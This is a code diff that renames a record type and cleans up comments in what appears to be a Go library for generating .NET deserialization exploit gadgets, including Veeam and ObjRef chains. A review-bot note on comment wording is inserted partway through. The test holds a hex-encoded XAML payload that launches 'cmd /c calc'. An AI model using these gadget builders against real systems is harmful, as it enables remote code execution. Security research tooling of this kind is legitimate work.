@@ -1517,11 +1517,11 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s // classWIthID 1 var classWithIDOneMemberValues []any - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 22, Value: "Compare"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 22, Value: "Compare"}) classWithIDOneMemberValues = append(classWithIDOneMemberValues, MemberReferenceRecord{IDRef: 12}) - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 24, Value: "System.String"}) - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 25, Value: "Int32 Compare(System.String, System.String)"}) - classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 26, Value: "System.Int32 Compare(System.String, System.String)"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 24, Value: "System.String"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 25, Value: "Int32 Compare(System.String, System.String)"}) + classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectString{ObjectID: 26, Value: "System.Int32 Compare(System.String, System.String)"}) classWithIDOneMemberValues = append(classWithIDOneMemberValues, 8) classWithIDOneMemberValues = append(classWithIDOneMemberValues, ObjectNullRecord{}) 
@@ -1532,7 +1532,7 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s } // classWIthID 2 var classWithIDTwoMemberValues []any - classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, BinaryObjectRecord{ObjectID: 27, Value: fmt.Sprintf("System.Comparison`1[[%s]]", mscorlibSystemString)}) + classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, BinaryObjectString{ObjectID: 27, Value: fmt.Sprintf("System.Comparison`1[[%s]]", mscorlibSystemString)}) classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, MemberReferenceRecord{IDRef: 12}) classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, ObjectNullRecord{}) classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, MemberReferenceRecord{IDRef: 12}) @@ -1618,7 +1618,7 @@ func CreateWindowsIdentity(program string, args string, formatter string) (strin innerTypeConfuseDelegateBase64 := string(b64String) var memberValues []any - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 2, Value: innerTypeConfuseDelegateBase64}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 2, Value: innerTypeConfuseDelegateBase64}) memberNames := []string{"System.Security.ClaimsIdentity.actor"} @@ -1683,7 +1683,7 @@ func CreateClaimsPrincipal(program string, args string, formatter string) (strin innerTypeConfuseDelegateBase64 := string(b64String) var memberValues []any - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5, Value: innerTypeConfuseDelegateBase64}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 5, Value: innerTypeConfuseDelegateBase64}) memberNames := []string{"m_serializedClaimsIdentities"} 
@@ -1771,7 +1771,7 @@ func CreateDataSetTypeSpoof(program string, args string, formatter string) (stri // Continue creating primary class var memberValues []any memberValues = append(memberValues, innerClassWithMembersAndTypes) - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 5}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 5}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 5}) memberValues = append(memberValues, false) @@ -1971,8 +1971,8 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) { memberValues = append(memberValues, ObjectNullRecord{}) // KeySetID null memberValues = append(memberValues, 1) // KeyType int32 - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4, Value: "aaaaa"}) // Hint STRING - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5, Value: "AAAA"}) // DecryptedKeyValue STRING + memberValues = append(memberValues, BinaryObjectString{ObjectID: 4, Value: "aaaaa"}) // Hint STRING + memberValues = append(memberValues, BinaryObjectString{ObjectID: 5, Value: "AAAA"}) // DecryptedKeyValue STRING memberValues = append(memberValues, 0x409) // locallcid int // 1033 memberValues = append(memberValues, "\x00\x00\x00\x00\x00\x00\x00\x00") // ModificationDateUtc datetime, just needs to be 8 bytes @@ -1980,7 +1980,7 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) { memberValues = append(memberValues, MemberReferenceRecord{IDRef: 6}) // CryptoAlg int 1 var arrayMembers []any - arrayMembers = append(arrayMembers, BinaryObjectRecord{ObjectID: 7, Value: innerObjRefB64}) + arrayMembers = append(arrayMembers, BinaryObjectString{ObjectID: 7, Value: innerObjRefB64}) arraySingleStringRecord := ArraySingleStringRecord{ ArrayInfo: ArrayInfo{ ObjectID: 6, 
@@ -2061,7 +2061,7 @@ func CreateObjectRef(url string, formatter string) (string, bool) { // SECOND CLASS, a value for the first one var secondMemberValues []any secondClassName := "System.Runtime.Remoting.ObjRef" - secondMemberValues = append(secondMemberValues, BinaryObjectRecord{ObjectID: 3, Value: url}) + secondMemberValues = append(secondMemberValues, BinaryObjectString{ObjectID: 3, Value: url}) secondMemberNames := []string{"url"} secondMemberTypes := []string{"String"} secondClassInfo := ClassInfo{ diff --git a/dotnet/dotnetgadget_test.go b/dotnet/dotnetgadget_test.go index 2cde725..268ff51 100644 --- a/dotnet/dotnetgadget_test.go +++ b/dotnet/dotnetgadget_test.go 
@@ -75,7 +75,7 @@ func TestGetBinaryObjectString(t *testing.T) {
 `, program, args)
- got := BinaryObjectRecord{ObjectID: 3, Value: xmlData}
+ got := BinaryObjectString{ObjectID: 3, Value: xmlData}
 got2, ok := got.ToRecordBin()
 if !ok || fmt.Sprintf("%02x", got2) != "060300000096043c5265736f7572636544696374696f6e6172790a0909786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2f70726573656e746174696f6e220a0909786d6c6e733a583d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c220a0909786d6c6e733a533d22636c722d6e616d6573706163653a53797374656d3b617373656d626c793d6d73636f726c6962220a0909786d6c6e733a443d22636c722d6e616d6573706163653a53797374656d2e446961676e6f73746963733b617373656d626c793d73797374656d220a093e0a09093c4f626a6563744461746150726f766964657220583a4b65793d2222204f626a656374547970653d227b583a5479706520443a50726f636573737d22204d6574686f644e616d653d225374617274223e0a0909093c4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e0a090909093c533a537472696e673e636d643c2f533a537472696e673e0a090909093c533a537472696e673e2f632063616c633c2f533a537472696e673e0a0909093c2f4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e0a09093c2f4f626a6563744461746150726f76696465723e0a093c2f5265736f7572636544696374696f6e6172793e" {
diff --git a/dotnet/records.go b/dotnet/records.go
index 321f63f..f53e71c 100644
--- a/dotnet/records.go
+++ b/dotnet/records.go
@@ -71,7 +71,7 @@ type ObjectNullMultiple256Record struct {
 type ObjectNullRecord struct{}
-type BinaryObjectRecord struct {
+type BinaryObjectString struct {
 ObjectID int
 Value string
 }
@@ -121,7 +121,7 @@ func (classWithIDRecord ClassWithIDRecord) GetRecordType() int {
 return RecordTypeEnumMap["ClassWithId"]
 }
-func (binaryObjectRecord BinaryObjectRecord) GetRecordType() int {
+func (binaryObjectRecord BinaryObjectString) GetRecordType() int {
 return RecordTypeEnumMap["BinaryObjectString"]
 }
@@ -212,7 +212,7 @@ func (classWithIDRecord ClassWithIDRecord) ToXML(_ ClassInfo, _ MemberTypeInfo,
 return MemberNode{}, false
 }
-func (binaryObjectRecord BinaryObjectRecord) ToXML(classInfo ClassInfo, memberTypeInfo MemberTypeInfo, _ BinaryLibraryRecord, currentIndex int, _ string) (MemberNode, bool) {
+func (binaryObjectRecord BinaryObjectString) ToXML(classInfo ClassInfo, memberTypeInfo MemberTypeInfo, _ BinaryLibraryRecord, currentIndex int, _ string) (MemberNode, bool) {
 memberNode := MemberNode{}
 memberNode.XMLName.Local = classInfo.MemberNames[currentIndex]
 memberNode.ID = fmt.Sprintf("ref-%d", binaryObjectRecord.ObjectID)
@@ -471,7 +471,7 @@ func (classWithIDRecord ClassWithIDRecord) ToRecordBin() (string, bool) {
 }
 // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/eb503ca5-e1f6-4271-a7ee-c4ca38d07996
-func (binaryObjectRecord BinaryObjectRecord) ToRecordBin() (string, bool) {
+func (binaryObjectRecord BinaryObjectString) ToRecordBin() (string, bool) {
 recordTypeEnumString := string(byte(binaryObjectRecord.GetRecordType()))
 objectIDString := transform.PackLittleInt32(binaryObjectRecord.ObjectID)
 prefixedValue := lengthPrefixedString(binaryObjectRecord.Value)
@@ -537,7 +537,7 @@ func (systemClassWithMembersAndTypesRecord SystemClassWithMembersAndTypesRecord)
 return "", false
 }
- ////////////////////////// ///objid, name, count, membernames//int8 type values+addInfo/the array of values
+ // objid, name, count, membernames//int8 type values+addInfo/the array of values
 return recordTypeEnumString + systemClassWithMembersAndTypesRecord.ClassInfo.ToBin() + memberTypeInfoString + memberValuesString, true
 }
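Review bot: The rewritten layout comment before the final `return` in the hunk at line 537 still uses `//` and `/` as field separators, and its counterpart in the hunk at line 599 runs `membernames+addinfo` straight into `the int8 values for types`, so neither reads as the ordered field list it is meant to be. Going by the two return expressions, I would write `// Layout: record type, ClassInfo (object ID, name, member count, member names), MemberTypeInfo (int8 type values + additional info), member values.` here, and the same with `library ID (int32)` inserted before `member values` in the 599 hunk. Both function bodies start outside their hunks, so the field order should be confirmed against the code that builds `memberTypeInfoString` and `memberValuesString`.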
@@ -599,6 +599,6 @@ func (classWithMembersAndTypesRecord ClassWithMembersAndTypesRecord) ToRecordBin
 return "", false
 }
- ////////////////////////////// id, name, count, membernames+addinfo // the int8 values for types //the int32 ID// the array of values
+ // id, name, count, membernames+addinfo the int8 values for types, the int32 ID, the array of values
 return recordTypeEnumString + classWithMembersAndTypesRecord.ClassInfo.ToBin() + memberTypeInfoString + libraryIDString + memberValuesString, true
 }